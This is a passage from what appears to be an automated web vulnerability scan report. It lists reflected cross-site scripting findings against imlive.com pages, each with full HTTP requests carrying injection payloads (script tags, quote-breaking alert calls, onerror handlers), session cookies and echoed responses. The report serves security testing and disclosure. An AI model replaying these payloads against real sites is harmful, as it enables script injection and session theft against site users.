<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||84ff7"><script>alert(1)</script>e0815795bf3~1');return false;"> ...[SNIP]...
2.43. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b12e'-alert(1)-'11d097f86af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2b12e'-alert(1)-'11d097f86af=1 HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81248"><script>alert(1)</script>dd3960e35d8 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855e3"><script>alert(1)</script>7145c8255ab was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d7c5'onerror%3d'alert(1)'1cb395fc54c was submitted in the gotopage parameter. This input was echoed as 2d7c5'onerror='alert(1)'1cb395fc54c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2d7c5'onerror%3d'alert(1)'1cb395fc54c HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:30 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQRQRCTC=GAOPGJMAIPBIPMLIPIDNAHJF; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:31 GMT Connection: close Content-Length: 8306 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1c5"><script>alert(1)</script>6962831ce28 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.48. http://imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17713'-alert(1)-'0edf03efbd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?17713'-alert(1)-'0edf03efbd6=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/?17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
2.49. http://imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c04"><a>b9169bf5b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?99c04"><a>b9169bf5b73=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 652a8'onerror%3d'alert(1)'f61ce20483c was submitted in the REST URL parameter 1. This input was echoed as 652a8'onerror='alert(1)'f61ce20483c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /652a8'onerror%3d'alert(1)'f61ce20483c HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:56 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:56 GMT Connection: close Content-Length: 8302 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.51. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /awardarena/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d56'-alert(1)-'698666eeaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /awardarena/?80d56'-alert(1)-'698666eeaa0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:57 GMT Connection: close Content-Length: 25371 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/?80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
2.52. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /awardarena/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ece"><a>e6c79bedc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /awardarena/?c9ece"><a>e6c79bedc05=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:54 GMT Connection: close Content-Length: 25222 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/awardarena/?c9ece"><a>e6c79bedc05=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47df2'onerror%3d'alert(1)'f893addb900 was submitted in the REST URL parameter 1. This input was echoed as 47df2'onerror='alert(1)'f893addb900 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /47df2'onerror%3d'alert(1)'f893addb900 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:11 GMT Connection: close Content-Length: 19702 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.54. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /become_host.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c68'-alert(1)-'911a666a53f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /become_host.asp?15c68'-alert(1)-'911a666a53f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:27 GMT Connection: close Content-Length: 21781 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
2.55. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /become_host.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8175d"><a>ad0c10fb84f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
